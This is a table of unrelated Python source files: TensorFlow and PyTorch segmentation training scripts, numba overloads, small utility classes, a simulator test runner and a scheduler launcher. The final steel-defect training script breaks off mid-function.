text stringlengths 38 1.54M |
|---|
# Written by Dr Daniel Buscombe, Marda Science LLC
# for the USGS Coastal Change Hazards Program
#
# MIT License
#
# Copyright (c) 2020, Marda Science LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os

# Select GPU vs CPU execution BEFORE TensorFlow is imported:
# CUDA_VISIBLE_DEVICES must be set prior to any CUDA initialization.
USE_GPU = True

if USE_GPU:  # idiom fix: was `if USE_GPU == True:`
    # use the first available GPU
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'  # '1'
else:
    # to use the CPU (not recommended):
    os.environ['CUDA_VISIBLE_DEVICES'] = '-1'

# suppress tensorflow C++ backend log messages (3 = errors only)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import json
from tkinter import filedialog
from tkinter import *
from random import shuffle
###############################################################
## VARIABLES
###############################################################
# --- interactive selection of inputs (blocking tkinter dialogs) ---
# Ask the user for the model config file (JSON).
root = Tk()
root.filename = filedialog.askopenfilename(initialdir = "/data",title = "Select config file",filetypes = (("config files","*.json"),("all files","*.*")))
configfile = root.filename
print(configfile)
root.withdraw()
# Ask the user for the directory containing the training data (.npz files).
root = Tk()
root.filename = filedialog.askdirectory(initialdir = "/samples",title = "Select directory of data files")
data_path = root.filename
print(data_path)
root.withdraw()
# Derive the weights-file path from the config path,
# e.g. .../config/foo.json -> .../weights/foo.h5
weights = configfile.replace('.json','.h5').replace('config', 'weights')
try:
    # create the weights directory if it does not already exist
    os.mkdir(os.path.dirname(weights))
except:  # NOTE(review): bare except silently swallows ALL errors, not just FileExistsError
    pass
#---------------------------------------------------
# Load the JSON config and promote every key to a module-level variable
# (e.g. config["BATCH_SIZE"] becomes the global BATCH_SIZE).
with open(configfile) as f:
    config = json.load(f)
for k in config.keys():
    # NOTE(review): exec on config keys executes arbitrary text from the
    # config file -- only use with trusted config files.
    exec(k+'=config["'+k+'"]')
# USE_LOCATION is optional in the config; default to False when absent.
if "USE_LOCATION" not in locals():
    USE_LOCATION = False
else:
    print('Location will be used')
from imports import *
#---------------------------------------------------
# Derive output figure paths from the weights path (weights/ -> data/).
trainsamples_fig = weights.replace('.h5','_train_sample_batch.png').replace('weights', 'data')
valsamples_fig = weights.replace('.h5','_val_sample_batch.png').replace('weights', 'data')
hist_fig = weights.replace('.h5','_trainhist_'+str(BATCH_SIZE)+'.png').replace('weights', 'data')
try:
    direc = os.path.dirname(hist_fig)
    print("Making new directory for example model outputs: %s"% (direc))
    os.mkdir(direc)
except:  # NOTE(review): bare except also hides errors other than "directory exists"
    pass
# Base path for per-sample validation/train figure outputs.
test_samples_fig = weights.replace('.h5','_val.png').replace('weights', 'data')
#---------------------------------------------------
# learning rate function
def lrfn(epoch, start_lr=None, min_lr=None, max_lr=None,
         rampup_epochs=None, sustain_epochs=None, exp_decay=None):
    """
    Piecewise ramp/hold/decay learning-rate schedule.

    The rate ramps linearly from ``start_lr`` to ``max_lr`` over
    ``rampup_epochs`` epochs, holds at ``max_lr`` for ``sustain_epochs``
    epochs, then decays exponentially (factor ``exp_decay`` per epoch)
    towards ``min_lr``.

    * INPUTS: current `epoch` number
    * OPTIONAL INPUTS: explicit schedule parameters; each defaults to the
      corresponding config global (`START_LR`, `MIN_LR`, `MAX_LR`,
      `RAMPUP_EPOCHS`, `SUSTAIN_EPOCHS`, `EXP_DECAY`) when omitted, so
      existing `lrfn(epoch)` call sites are unchanged
    * OUTPUTS: the learning rate (float) for this epoch
    """
    # Fall back to the config-file globals lazily, so the function is
    # importable (and testable) without a loaded config.
    # (The original wrapped this in a needless inner closure that
    # shadowed the globals with same-named parameters.)
    if start_lr is None: start_lr = START_LR
    if min_lr is None: min_lr = MIN_LR
    if max_lr is None: max_lr = MAX_LR
    if rampup_epochs is None: rampup_epochs = RAMPUP_EPOCHS
    if sustain_epochs is None: sustain_epochs = SUSTAIN_EPOCHS
    if exp_decay is None: exp_decay = EXP_DECAY

    if epoch < rampup_epochs:
        # linear ramp from start_lr up to max_lr
        return (max_lr - start_lr) / rampup_epochs * epoch + start_lr
    if epoch < rampup_epochs + sustain_epochs:
        # hold at the maximum
        return max_lr
    # exponential decay towards min_lr
    return (max_lr - min_lr) * exp_decay ** (epoch - rampup_epochs - sustain_epochs) + min_lr
#-----------------------------------
def load_npz(example):
    """
    Read one .npz training example into image/label arrays.

    * INPUTS: `example` -- a tf string tensor holding the npz filename
      (called via tf.py_function, hence `example.numpy()`).
    * GLOBAL INPUTS: `N_DATA_BANDS`, `USE_LOCATION`; helpers
      `standardize`, `rescale` from `imports`.
    * OUTPUTS: (image, nir, label) for 4-band data, else (image, label).

    NOTE(review): indentation reconstructed from a flattened source;
    confirm the block boundaries against the original file.
    """
    if N_DATA_BANDS==4:
        with np.load(example.numpy()) as data:
            image = data['arr_0'].astype('uint8')
            image = standardize(image)
            nir = data['arr_1'].astype('uint8')
            nir = standardize(nir)
            label = data['arr_2'].astype('uint8')
        # pair the visible-band image with the NIR band
        image = tf.stack([image, nir], axis=-1)
        if USE_LOCATION:
            # append a normalized radial-distance "location" channel
            gx,gy = np.meshgrid(np.arange(image.shape[1]), np.arange(image.shape[0]))
            loc = np.sqrt(gx**2 + gy**2)
            loc /= loc.max()
            loc = (255*loc).astype('uint8')
            image = np.dstack((image, loc))
            # rescale the location channel to the image's value range
            mx = np.max(image)
            m = np.min(image)
            tmp = rescale(loc, m, mx)
            image = tf.stack([image[:,:,0], image[:,:,1], image[:,:,2], nir, tmp], axis=-1)
            image = tf.cast(image, 'float32')
        return image, nir,label
    else:
        with np.load(example.numpy()) as data:
            image = data['arr_0'].astype('uint8')
            image = standardize(image)
            label = data['arr_1'].astype('uint8')
        if USE_LOCATION:
            # append a normalized radial-distance "location" channel
            gx,gy = np.meshgrid(np.arange(image.shape[1]), np.arange(image.shape[0]))
            loc = np.sqrt(gx**2 + gy**2)
            loc /= loc.max()
            loc = (255*loc).astype('uint8')
            image = np.dstack((image, loc))
            image = standardize(image)
            mx = np.max(image)
            m = np.min(image)
            tmp = rescale(loc, m, mx)
            image = tf.stack([image[:,:,0], image[:,:,1], image[:,:,2], tmp], axis=-1)
            image = tf.cast(image, 'float32')
        return image, label
@tf.autograph.experimental.do_not_convert
#-----------------------------------
def read_seg_dataset_multiclass(example):
    """
    "read_seg_dataset_multiclass(example)"
    This function reads an example from a npz file into a single image and label
    INPUTS:
        * dataset example object (filename of npz)
    OPTIONAL INPUTS: None
    GLOBAL INPUTS: TARGET_SIZE, N_DATA_BANDS, NCLASSES
    OUTPUTS:
        * image [tensor array]
        * class_label [tensor array]
    """
    if N_DATA_BANDS==4:
        # 4-band npz files yield (image, nir, label)
        image, nir, label = tf.py_function(func=load_npz, inp=[example], Tout=[tf.uint8, tf.uint8, tf.uint8])
        nir = tf.cast(nir, tf.float32)#/ 255.0
    else:
        # NOTE(review): Tout dtypes differ between branches (float32 here,
        # uint8 above) -- confirm this matches what load_npz returns.
        image, label = tf.py_function(func=load_npz, inp=[example], Tout=[tf.float32, tf.uint8])
    # image = tf.cast(image, tf.float32)#/ 255.0
    # label = tf.cast(label, tf.uint8)
    if N_DATA_BANDS==4:
        # re-attach the NIR band as the final channel
        image = tf.concat([image, tf.expand_dims(nir,-1)],-1)
    if NCLASSES==1:
        # binary segmentation labels need an explicit channel dimension
        label = tf.expand_dims(label,-1)
    #image = tf.image.per_image_standardization(image)
    if NCLASSES>1:
        if N_DATA_BANDS>1:
            # drop any singleton dimensions added by py_function
            return tf.squeeze(image), tf.squeeze(label)
        else:
            return image, label
    else:
        return image, label
###############################################################
### main
###############################################################
if USE_GPU:
    print('GPU name: ', tf.config.experimental.list_physical_devices('GPU'))
    print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))

#-------------------------------------------------
# Build the train/validation tf.data pipelines from the npz files.
filenames = tf.io.gfile.glob(data_path+os.sep+ROOT_STRING+'*.npz')
shuffle(filenames)  # shuffle once, then keep a fixed train/val split
list_ds = tf.data.Dataset.list_files(filenames, shuffle=False)

val_size = int(len(filenames) * VALIDATION_SPLIT)
validation_steps = val_size // BATCH_SIZE
# BUG FIX: the original computed `int(len(filenames) * 1-VALIDATION_SPLIT)`,
# which by operator precedence is ~len(filenames); the training set is the
# (1 - VALIDATION_SPLIT) fraction of the files.
steps_per_epoch = int(len(filenames) * (1 - VALIDATION_SPLIT)) // BATCH_SIZE
print(steps_per_epoch)
print(validation_steps)

# first val_size files are validation, the rest training
train_ds = list_ds.skip(val_size)
val_ds = list_ds.take(val_size)

# Set `num_parallel_calls` so multiple images are loaded/processed in parallel.
train_ds = train_ds.map(read_seg_dataset_multiclass, num_parallel_calls=AUTO)
train_ds = train_ds.repeat()
train_ds = train_ds.batch(BATCH_SIZE, drop_remainder=True) # drop_remainder will be needed on TPU
train_ds = train_ds.prefetch(AUTO) #

val_ds = val_ds.map(read_seg_dataset_multiclass, num_parallel_calls=AUTO)
val_ds = val_ds.repeat()
val_ds = val_ds.batch(BATCH_SIZE, drop_remainder=True) # drop_remainder will be needed on TPU
val_ds = val_ds.prefetch(AUTO) #
# if DO_TRAIN:
# # if N_DATA_BANDS<=3:
# for imgs,lbls in train_ds.take(10):
# print(imgs.shape)
# print(lbls.shape)
# plt.figure(figsize=(16,16))
# for imgs,lbls in train_ds.take(100):
# #print(lbls)
# for count,(im,lab) in enumerate(zip(imgs, lbls)):
# plt.subplot(int(BATCH_SIZE+1/2),2,count+1)
# plt.imshow(im)
# if NCLASSES==1:
# plt.imshow(lab, cmap='gray', alpha=0.5, vmin=0, vmax=NCLASSES)
# else:
# lab = np.argmax(lab,-1)
# plt.imshow(lab, cmap='bwr', alpha=0.5, vmin=0, vmax=NCLASSES)
#
# plt.axis('off')
# print(np.unique(lab))
# plt.axis('off')
# plt.close('all')
print('.....................................')
print('Creating and compiling model ...')

# The input band count grows by one when a location channel is appended.
# (The original branched on NCLASSES==1 vs >1 with byte-identical bodies;
# only USE_LOCATION actually changes the call.)
if USE_LOCATION:
    model = res_unet((TARGET_SIZE[0], TARGET_SIZE[1], N_DATA_BANDS+1), BATCH_SIZE, NCLASSES, (KERNEL_SIZE, KERNEL_SIZE))
else:
    model = res_unet((TARGET_SIZE[0], TARGET_SIZE[1], N_DATA_BANDS), BATCH_SIZE, NCLASSES, (KERNEL_SIZE, KERNEL_SIZE))

model.compile(optimizer = 'adam', loss =dice_coef_loss, metrics = [mean_iou, dice_coef])

# Stop early when validation loss stops improving.
earlystop = EarlyStopping(monitor="val_loss",
                          mode="min", patience=PATIENCE)

# set checkpoint file: keep only the best weights (by validation loss)
model_checkpoint = ModelCheckpoint(weights, monitor='val_loss',
                                   verbose=0, save_best_only=True, mode='min',
                                   save_weights_only = True)

# models are sensitive to specification of learning rate. How do you decide? Answer: you don't. Use a learning rate scheduler
lr_callback = tf.keras.callbacks.LearningRateScheduler(lambda epoch: lrfn(epoch), verbose=True)

callbacks = [model_checkpoint, earlystop, lr_callback]
if DO_TRAIN:
    print('.....................................')
    print('Training model ...')
    # Train; the best weights are written to `weights` by ModelCheckpoint.
    history = model.fit(train_ds, steps_per_epoch=steps_per_epoch, epochs=MAX_EPOCHS,
                        validation_data=val_ds, validation_steps=validation_steps,
                        callbacks=callbacks)
    # Plot training history
    plot_seg_history_iou(history, hist_fig)
    plt.close('all')
    K.clear_session()
else:
    # not training: load previously saved weights instead
    model.load_weights(weights)

# # ##########################################################
# ### evaluate
print('.....................................')
print('Evaluating model on entire validation set ...')
# # testing
scores = model.evaluate(val_ds, steps=validation_steps)
print('loss={loss:0.4f}, Mean IOU={mean_iou:0.4f}, Mean Dice={mean_dice:0.4f}'.format(loss=scores[0], mean_iou=scores[1], mean_dice=scores[2]))
# # # ##########################################################
# Visualize up to 10 validation batches and accumulate per-image IoU scores.
IOUc = []
counter = 0
for i,l in val_ds.take(10):
    for img,lbl in zip(i,l):
        # print(img.shape)
        # img = tf.image.per_image_standardization(img)
        # if USE_LOCATION:
        #     img = standardize(img)
        #     mx = np.max(img)
        #     m = np.min(img)
        #     tmp = rescale(loc, m, mx)
        #     img = tf.stack([img[:,:,0], img[:,:,1], img[:,:,2], tmp], axis=-1)
        # else:
        #     img = standardize(img)
        img2 = standardize(img)
        # predict on a single-image batch
        est_label = model.predict(tf.expand_dims(img2, 0) , batch_size=1).squeeze()
        if NCLASSES==1:
            # binarize the sigmoid output at 0.5
            est_label[est_label<.5] = 0
            est_label[est_label>.5] = 1
        else:
            est_label = np.argmax(est_label, -1)
        if NCLASSES==1:
            lbl = lbl.numpy().squeeze()
        else:
            lbl = np.argmax(lbl.numpy(), -1)
        iouscore = iou(lbl, est_label, NCLASSES+1)
        # rescale image values to [0, 1] for display
        img = rescale(img.numpy(), 0, 1)
        if DOPLOT:
            # left panel: image + ground-truth label overlay
            plt.subplot(221)
            if np.ndim(img)>=3:
                plt.imshow(img[:,:,0], cmap='gray')
            else:
                plt.imshow(img)#, cmap='gray')
            if NCLASSES==1:
                plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
            else:
                plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
            plt.axis('off')
            # right panel: image + predicted label overlay
            plt.subplot(222)
            if np.ndim(img)>=3:
                plt.imshow(img[:,:,0], cmap='gray')
            else:
                plt.imshow(img)#, cmap='gray')
            if NCLASSES==1:
                plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
            else:
                plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
            plt.axis('off')
            plt.title('iou = '+str(iouscore)[:5], fontsize=6)
            # NOTE(review): IoU accumulation and figure saving reconstructed as
            # inside the DOPLOT branch (original indentation was lost) -- confirm.
            IOUc.append(iouscore)
            plt.savefig(test_samples_fig.replace('_val.png', '_val_'+str(counter)+'.png'),
                        dpi=200, bbox_inches='tight')
            plt.close('all')
        counter += 1
print('Mean IoU (validation subset)={mean_iou:0.3f}'.format(mean_iou=np.mean(IOUc)))
##### training subset
# Same visualization/IoU loop as above, on up to 10 training batches.
IOUc = []
counter = 0
for i,l in train_ds.take(10):
    for img,lbl in zip(i,l):
        # print(img.shape)
        # img = tf.image.per_image_standardization(img)
        # if USE_LOCATION:
        #     img = standardize(img)
        #     mx = np.max(img)
        #     m = np.min(img)
        #     tmp = rescale(loc, m, mx)
        #     img = tf.stack([img[:,:,0], img[:,:,1], img[:,:,2], tmp], axis=-1)
        # else:
        #     img = standardize(img)
        img2 = standardize(img)
        # predict on a single-image batch
        est_label = model.predict(tf.expand_dims(img2, 0) , batch_size=1).squeeze()
        if NCLASSES==1:
            # binarize the sigmoid output at 0.5
            est_label[est_label<.5] = 0
            est_label[est_label>.5] = 1
        else:
            est_label = np.argmax(est_label, -1)
        if NCLASSES==1:
            lbl = lbl.numpy().squeeze()
        else:
            lbl = np.argmax(lbl.numpy(), -1)
        iouscore = iou(lbl, est_label, NCLASSES+1)
        # rescale image values to [0, 1] for display
        img = rescale(img.numpy(), 0, 1)
        if DOPLOT:
            # left panel: image + ground-truth label overlay
            plt.subplot(221)
            if np.ndim(img)>=3:
                plt.imshow(img[:,:,0], cmap='gray')
            else:
                plt.imshow(img)#, cmap='gray')
            if NCLASSES==1:
                plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
            else:
                plt.imshow(lbl, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
            plt.axis('off')
            # right panel: image + predicted label overlay
            plt.subplot(222)
            if np.ndim(img)>=3:
                plt.imshow(img[:,:,0], cmap='gray')
            else:
                plt.imshow(img)#, cmap='gray')
            if NCLASSES==1:
                plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES)
            else:
                plt.imshow(est_label, alpha=0.1, cmap=plt.cm.bwr, vmin=0, vmax=NCLASSES-1)
            plt.axis('off')
            plt.title('iou = '+str(iouscore)[:5], fontsize=6)
            # NOTE(review): IoU accumulation and figure saving reconstructed as
            # inside the DOPLOT branch (original indentation was lost) -- confirm.
            IOUc.append(iouscore)
            plt.savefig(test_samples_fig.replace('_val.png', '_train_'+str(counter)+'.png'),
                        dpi=200, bbox_inches='tight')
            plt.close('all')
        counter += 1
print('Mean IoU (train subset)={mean_iou:0.3f}'.format(mean_iou=np.mean(IOUc)))
|
from numba.core.extending import overload
from numba.core import types
from numba.misc.special import literally, literal_unroll
from numba.core.errors import TypingError
@overload(literally)
def _ov_literally(obj):
    """Typing-time overload of ``literally``: identity for literal types."""
    # Only Literal / InitialValue types may pass through unchanged.
    if not isinstance(obj, (types.Literal, types.InitialValue)):
        raise TypingError(
            "Invalid use of non-Literal type in literally({})".format(obj))

    def impl(obj):
        return obj

    return impl
@overload(literal_unroll)
def literal_unroll_impl(container):
    """Typing-time overload of ``literal_unroll``: identity passthrough."""
    # A Poison type means typing already failed upstream.
    if isinstance(container, types.Poison):
        raise TypingError(
            f"Invalid use of non-Literal type in literal_unroll({container})")
    return lambda container: container
|
import os
from time import time
class ProjectPath:
    """Builds a timestamped model-output path under the project root."""

    # project root: two directory levels above this file
    base = os.path.dirname(os.path.dirname(__file__))

    def __init__(self, logdir):
        from time import localtime, strftime
        self.logdir = logdir
        # e.g. "January_05__13_42"
        self.timestamp = strftime("%B_%d__%H_%M", localtime())
        # <base>/<logdir>/<timestamp>
        self.model_path = os.path.join(ProjectPath.base, self.logdir, self.timestamp)
class Timer:
    """Measures elapsed wall-clock time between successive calls."""

    def __init__(self):
        # wall-clock time of the previous measurement
        self.curr_time = time()

    def time(self):
        """Return seconds elapsed since the previous call (or construction)."""
        now = time()
        elapsed = now - self.curr_time
        self.curr_time = now
        return elapsed
|
#!/usr/bin/env python3
import os
import os.path
import subprocess
import sys
import pyparsing as pp
# Marker strings used to tag check lines in assembly listings.
MARK = "|@|"
MARK_ARGS = ";;;@;;;"

# Paths to the assembler and simulator, relative to this script.
root = os.path.dirname(sys.argv[0])
ASM = os.path.join(root, "asm")
SIM = os.path.join(root, "sim")

# Mutable error counter (a one-element list so functions can update it).
errors = [0]


def error(msg):
    """Print an error message and bump the global error counter."""
    print("error: %s" % msg)
    errors[0] += 1
def grammer():
    """Build the pyparsing grammar for one check line: ``N ($reg=HEX ...)``."""
    lparen = pp.Suppress("(")
    rparen = pp.Suppress(")")
    equal = pp.Suppress("=")
    eol = pp.Suppress(pp.LineEnd())
    # a register name: $0-$7 or $cr0-$cr7
    reg = pp.Combine("$" + pp.Optional("cr") + pp.Word(pp.srange("[0-7]"), max=1))
    # a decimal clock number, converted to int
    num = pp.Word(pp.srange("[0-9]")).setParseAction(lambda s, l, t: int(t[0]))
    # a hexadecimal register value, converted to int
    val = pp.Word(pp.srange("[0-9a-fA-F]")).setParseAction(lambda s, l, t: int(t[0], 16))
    # one or more "$reg = value" pairs, keyed by register name
    values = pp.Dict(pp.OneOrMore(pp.Group(reg + equal + val)))
    return num + lparen + values + rparen + eol
def parse(stream):
    """
    Parse MARK-tagged check lines from *stream*.

    Returns (results, sim_args): `results` maps clock number -> parse
    result, and `sim_args` holds extra simulator arguments found after a
    ':' on the first line (when tagged with MARK_ARGS).

    NOTE(review): indentation reconstructed from a flattened source --
    `first_line = False` is assumed to run after every line; confirm.
    """
    g = grammer()
    results = {}
    sim_args = ""
    first_line = True
    for line in stream:
        # simulator args may only be declared on the first line
        if first_line and MARK_ARGS in line:
            colon = line.find(":") + 1
            sim_args = line[colon:]
        first_line = False
        if MARK in line:
            # parse everything after the MARK tag
            subline = line[line.find(MARK) + len(MARK):]
            res = g.parseString(subline)
            # res[0] is the clock number (int, via the grammar's parse action)
            results[res[0]] = res
    return results, sim_args
def build_command(exe, clocks, args):
    """Assemble the single-line simulator command for *exe*.

    Checks state at every clock in *clocks* and stops at the largest one;
    the trace log path is derived from the object-file name.
    """
    trace_file = exe.replace(".o", ".trace.log")
    template = """
    {sim} {exe} --no-debugger
    --test-clock {clocks}
    --stop-clock {stop}
    --trace {trace}
    {args}
    """
    cmd = template.format(
        sim=SIM,
        exe=exe,
        clocks=" ".join(map(str, clocks)),
        stop=max(clocks),
        trace=trace_file,
        args=args,
    )
    # collapse the template onto one line for the shell
    return cmd.replace("\n", "").strip()
def simulate(exe, clocks, sim_args):
    """Run the simulator on *exe*; yield its non-empty output lines, MARK-tagged."""
    output = do_proc(build_command(exe, clocks, sim_args))
    for line in output.split("\n"):
        if line.strip():
            # re-tag so the simulator output can be fed back through parse()
            yield MARK + line
def asserts(output, checks):
    """Verify each expected register value appears in the simulator *output*."""
    for clock, expected in sorted(checks.items()):
        try:
            actual = output[clock]
            for reg, want in sorted(expected.items()):
                if want != actual[reg]:
                    error("@%d %s expected %04X got %04X" % (
                        clock, reg, want, actual[reg]))
        except KeyError:
            # the simulator never reported this clock
            error("clock %s not found in output" % clock)
def do_proc(cmd):
    """Run *cmd* through the shell; return combined stdout+stderr as text.

    Raises Exception when the command exits with a non-zero status.
    """
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    stdout, _ = proc.communicate()
    text = stdout.decode("utf-8")
    if proc.returncode == 0:
        return text
    print(text, end=' ')
    raise Exception("Return code %d received from '%s'" % (
        proc.returncode, cmd))
def main(args):
    """Entry point: check a testfile's expectations against simulator output.

    Returns 0 on success, the accumulated error count on check failures,
    1 on file/parse problems, or 2 on bad usage.
    """
    if len(args) != 2:
        print("USAGE: %s testfile.asm testfile.o" % sys.argv[0])
        return 2
    asm_filename, exe_filename = args
    # both input files must exist before anything is run
    for filename in (asm_filename, exe_filename):
        if not os.path.exists(filename):
            print("ERROR: could not open file: " + filename)
            return 1
    try:
        checks, sim_args = parse(open(asm_filename))
        if not checks:
            print("ERROR: no checks found in " + asm_filename)
            return 1
        sim_output = simulate(exe_filename, list(checks.keys()), sim_args)
        parsed_output, _ = parse(sim_output)
        asserts(parsed_output, checks)
    except (pp.ParseException, pp.ParseFatalException) as err:
        # point at the offending column in the failing line
        print(err.line)
        print(" " * (err.column - 1) + "^")
        print(err)
        return 1
    return errors[0]


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
|
def csv(a):
    """
    Print and return the '!'-separated fields of each line of file *a*.

    Fixes over the original: Python 3 ``print()`` calls (the original used
    Python 2 print statements), the file handle is closed via a context
    manager instead of leaking, and the parsed rows are returned (the
    original returned None, so this is backward-compatible).

    Parameters
    ----------
    a : str
        Path of the text file to read.

    Returns
    -------
    list[list[str]]
        One list of fields per line (trailing newlines preserved, as before).
    """
    # NOTE: this function name shadows the stdlib `csv` module by design of
    # the original script.
    print("FILE NAME IS:::")
    print(a)
    with open(a, 'r') as f:
        b = f.readlines()
    rows = [i.split('!') for i in b]
    print(rows)
    return rows


if __name__ == "__main__":
    # demo invocation, guarded so importing this module has no side effects
    csv("eg.txt")
|
import asyncio
import sys
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from ntpan.config import params
from ntpan.log import log
from ntpan.main import collect
if __name__ == "__main__":
    # Schedule the `collect` job at a fixed interval (from config) and run
    # the asyncio event loop forever, until interrupted.
    scheduler = AsyncIOScheduler()
    scheduler.add_job(collect, "interval", minutes=params.run_interval, id="ntpan")
    scheduler.start()
    try:
        log.success("Starting NTPAN...")
        # NOTE(review): asyncio.get_event_loop() is deprecated for this use
        # since Python 3.10 -- consider an explicitly created loop.
        asyncio.get_event_loop().run_forever()
    except (KeyboardInterrupt, SystemExit):
        # exit non-zero on interruption, as the original did
        log.critical("Stopping NTPAN...")
        sys.exit(1)
|
class Cell:
    """An integer-valued cell supporting +, -, * and / against other Cells.

    Subtraction and division must leave at least 1 in the result; otherwise
    a TypeError is raised (kept as TypeError -- not ValueError -- for
    backward compatibility with existing callers).

    Fixes over the original: spelling of the error messages
    ('ceils' -> 'cells', 'musb' -> 'must'), removal of a leftover debug
    print in make_order, and de-duplication of the type checks.
    """

    num = 0  # default count, overwritten by __init__

    def __init__(self, num):
        self.num = num

    @staticmethod
    def _check_pair(a, b):
        """Raise TypeError unless *a* and *b* have the same type."""
        if type(a) != type(b):
            raise TypeError('Both arguments must be cells')

    def __add__(self, other):
        self._check_pair(self, other)
        return Cell(self.num + other.num)

    def __sub__(self, other):
        self._check_pair(self, other)
        num = self.num - other.num
        if num < 1:
            raise TypeError('Second cell must be smaller than first')
        return Cell(num)

    def __mul__(self, other):
        self._check_pair(self, other)
        return Cell(self.num * other.num)

    def __truediv__(self, other):
        self._check_pair(self, other)
        # integer (floor) division, as in the original
        num = self.num // other.num
        if num < 1:
            raise TypeError('Second cell must be smaller than first')
        return Cell(num)

    def make_order(self, in_row):
        """Return the cell contents drawn as '\\n'-joined rows of '*', *in_row* wide."""
        full, rest = divmod(self.num, in_row)
        rows = ['*' * in_row] * full
        if rest:
            rows.append('*' * rest)
        return '\n'.join(rows)
|
import glob
import os
import cv2
import argparse
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.model_selection import train_test_split
from tqdm import tqdm
from albumentations import (Compose, Flip, HorizontalFlip, Normalize,
RandomBrightnessContrast, RandomBrightness, RandomContrast, RandomGamma, OneOf, ToFloat,
RandomSizedCrop, ShiftScaleRotate)
import copy
from bayes_opt import BayesianOptimization
import torch
import torchvision
import torchvision.transforms as transforms
import torch.optim as optim
import torchvision.models as models
from torch import nn
from torch.optim.lr_scheduler import ReduceLROnPlateau
from dataset import SteelDataset, BalanceClassSamplerMultilabel
from unet import Unet
from metric import dice_metric
from utils import mask2rle, rle2mask, plot_mask, analyze_labels, seed_everything, print2file
from loss import criterion_wbce_dice, criterion_wbce_lovasz, criterion_wmse, criterion_wbce, loss_BCE, loss_dice, loss_lovasz, loss_BCE_dice, loss_BCE_lovasz
from evaluate import Evaluate
def evaluate_batch(data, outputs, args, threshold=0.5):
    """Score one batch: returns (dice over masks, auxiliary-metric sum).

    args.output selects the head layout: 0 = segmentation only,
    1 = segmentation + regression, 2 = segmentation + classification.
    """
    if args.output == 0:
        # single segmentation head
        masks = data[1].detach().cpu().numpy()
        preds = (torch.sigmoid(outputs).detach().cpu().numpy() > threshold).astype(int)
        return dice_metric(masks, preds), 0.0
    if args.output in (1, 2):
        masks = data[1].detach().cpu().numpy()
        labels = data[2].detach().cpu().numpy()
        preds = (torch.sigmoid(outputs[0]).detach().cpu().numpy() > threshold).astype(int)
        if args.output == 1:
            # regression head: accumulate absolute errors
            pred_labels = outputs[1].detach().cpu().numpy()
            return dice_metric(masks, preds), np.sum(np.sqrt((pred_labels - labels) ** 2))
        # classification head: count correct predictions
        pred_labels = (torch.sigmoid(outputs[1]).detach().cpu().numpy() > threshold).astype(int)
        return dice_metric(masks, preds), np.sum((pred_labels == labels).astype(int))
def evaluate_loader(net, device, dataloader, args):
    """Accumulate (loss, dice, auxiliary metric) over an entire dataloader."""
    total_loss = 0.0
    total_dice = 0.0
    total_other = 0.0
    with torch.no_grad():
        for data in dataloader:
            # NHWC -> NCHW for the network
            images = data[0].to(device).permute(0, 3, 1, 2)
            outputs = net(images)
            total_loss += compute_loss(args, outputs, data).item()
            batch_dice, batch_other = evaluate_batch(data, outputs, args)
            total_dice += batch_dice
            total_other += batch_other
    return total_loss, total_dice, total_other
def compute_loss(args, outputs, data, acc_step = 1):
    """Compute the (possibly multi-task) training loss for one batch.

    args.loss selects the segmentation loss (0 BCE, 1 wbce+dice,
    2 wbce+lovasz, 3 lovasz); args.output selects the auxiliary head
    (0 none, 1 regression, 2 classification). The segmentation loss is
    divided by acc_step for gradient accumulation.

    BUG FIX: the original's trailing `else: raise NotImplementedError`
    also fired when args.output == 0 (no auxiliary head); now only
    unrecognized args.output values raise.

    NOTE(review): `device` is read from module globals -- confirm it is
    defined before training starts.
    """
    if args.loss == 0:
        criterion = nn.BCEWithLogitsLoss()
    # obtain the mask
    masks = data[1].to(device)
    # there is a second task
    if args.output == 1 or args.output == 2:
        labels = data[2].to(device)
        outputs_mask = outputs[0]
        outputs_other = outputs[1]
    else:
        outputs_mask = outputs
    # NHWC -> NCHW to match the network output
    masks = masks.permute(0, 3, 1, 2)
    # different segmentation losses
    if args.loss == 0:
        loss = criterion(outputs_mask, masks) / acc_step
    elif args.loss == 1:
        loss = criterion_wbce_dice(outputs_mask, masks) / acc_step
    elif args.loss == 2:
        loss = criterion_wbce_lovasz(outputs_mask, masks) / acc_step
    elif args.loss == 3:
        loss = loss_lovasz(outputs_mask, masks) / acc_step
    else:
        raise NotImplementedError
    # auxiliary-task loss (weighted at 0.2)
    if args.output == 1:
        loss += 0.2 * criterion_wmse(outputs_other, labels)
    elif args.output == 2:
        loss += 0.2 * criterion_wbce(outputs_other, labels)
    elif args.output != 0:
